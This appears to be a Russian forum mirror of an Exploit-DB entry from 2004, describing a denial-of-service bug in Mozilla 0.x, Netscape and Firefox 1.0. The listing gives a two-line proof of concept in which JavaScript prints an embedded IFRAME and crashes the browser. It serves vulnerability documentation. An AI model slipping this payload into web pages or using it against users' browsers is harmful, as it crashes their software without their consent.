- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24799
- Проверка EDB
-
- Пройдено
- Автор
- NIEK VAN DER MAAS
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2004-12-06
Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service
Код:
source: https://www.securityfocus.com/bid/11823/info
Mozilla/Netscape and Firefox browsers are reported prone a remote denial of service vulnerability. It is reported that the affected browsers will crash as a result of a NULL pointer dereference when a JavaScript function attempts to print an IFRAME that is embedded in the page.
Replace '[' with '<' and ']' with '>'.
[iframe id="pocframe" name="pocframe" src="about:blank"></iframe]
[script type="text/javascript">window.frames.pocframe.print();</script]
- Источник
- www.exploit-db.com